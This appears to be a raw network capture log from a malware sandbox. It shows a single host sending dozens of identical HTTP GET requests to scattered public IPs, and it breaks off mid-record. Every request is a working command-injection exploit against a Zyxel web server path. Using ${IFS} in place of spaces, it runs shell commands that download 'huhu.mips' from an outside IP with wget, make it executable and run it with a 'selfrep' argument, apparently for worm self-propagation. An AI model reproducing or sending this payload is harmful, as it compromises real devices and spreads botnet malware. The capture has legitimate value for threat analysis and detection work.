                                                      Feb 2, 2024 06:34:59.108764887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      73192.168.2.1441694136.97.183.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.108787060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      74192.168.2.1455374205.14.227.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.108881950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      75192.168.2.1436242124.118.109.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.108911037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      76192.168.2.144251893.148.59.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.109029055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      77192.168.2.14363024.212.207.47443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.109070063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      78192.168.2.1446808212.146.8.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.109110117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      79192.168.2.144733070.229.99.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.109225035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      80192.168.2.145435693.207.191.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.109266996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      81192.168.2.1457548212.252.7.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.109302044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      82192.168.2.143724276.117.144.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.109394073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      83192.168.2.1439882185.41.49.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.109471083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      84192.168.2.1435174217.174.22.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.109565973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      85192.168.2.145720482.232.68.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.109661102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      86192.168.2.143451292.147.143.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.109666109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      87192.168.2.1437084113.129.1.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.109740019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      88192.168.2.1440132131.60.122.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.109790087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      89192.168.2.143812284.194.147.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.109883070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      90192.168.2.145132060.68.8.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.109925985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      91192.168.2.144790854.203.189.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.110024929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      92192.168.2.1433178219.190.72.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.110127926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      93192.168.2.1444032101.227.93.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.110184908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      94192.168.2.145295093.23.151.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.110268116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      95192.168.2.1433106206.144.1.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.110347986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      96192.168.2.145752424.65.32.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.110426903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      97192.168.2.1441592161.43.94.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.110511065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      98192.168.2.1455158178.50.215.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.110588074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      99192.168.2.1451960148.175.144.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.110635042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      100192.168.2.1434002130.112.212.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.110740900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      101192.168.2.1442134138.11.106.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.110764980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      102192.168.2.143628287.114.143.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.110826969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      103192.168.2.144001644.234.155.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.110934973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      104192.168.2.1438946110.40.222.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.110964060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      105192.168.2.1458438102.40.241.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.111022949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      106192.168.2.145508864.28.251.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.111107111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      107192.168.2.145733289.218.212.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.111180067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      108192.168.2.1440884106.0.157.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.111219883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      109192.168.2.145461666.163.149.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.111304998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      110192.168.2.143756284.138.35.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.111411095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      111192.168.2.14560168.172.155.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.111510038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      112192.168.2.1434798221.199.81.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.111598969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      113192.168.2.1452406184.75.35.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.111673117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      114192.168.2.1436308198.8.2.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.111794949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      115192.168.2.1459320197.164.34.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.111846924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      116192.168.2.145018671.227.186.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.111876011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      117192.168.2.1460880122.122.101.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.111890078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      118192.168.2.1440660217.122.44.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.111990929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      119192.168.2.145039812.130.144.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.112020969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      120192.168.2.1442178122.108.170.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.112209082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      121192.168.2.143412693.238.206.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.112262011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      122192.168.2.14460324.215.227.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.112382889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      123192.168.2.1452396124.65.71.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.112411022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      124192.168.2.144321860.174.49.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.112504005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      125192.168.2.1442796125.164.132.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.112576008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      126192.168.2.1445370175.100.63.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.112658978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      127192.168.2.144019899.61.57.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.112708092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      128192.168.2.146088825.155.72.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.112786055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      129192.168.2.1438222210.49.17.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.112838984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      130192.168.2.1442186110.49.157.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.112935066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      131192.168.2.145845673.39.89.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.112996101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      132192.168.2.1435716220.184.231.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.113042116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      133192.168.2.1438832139.76.88.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.113141060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      134192.168.2.1442048170.214.41.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.113213062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      135192.168.2.145272881.239.15.179443
                                                      TimestampBytes transferredDirectionData
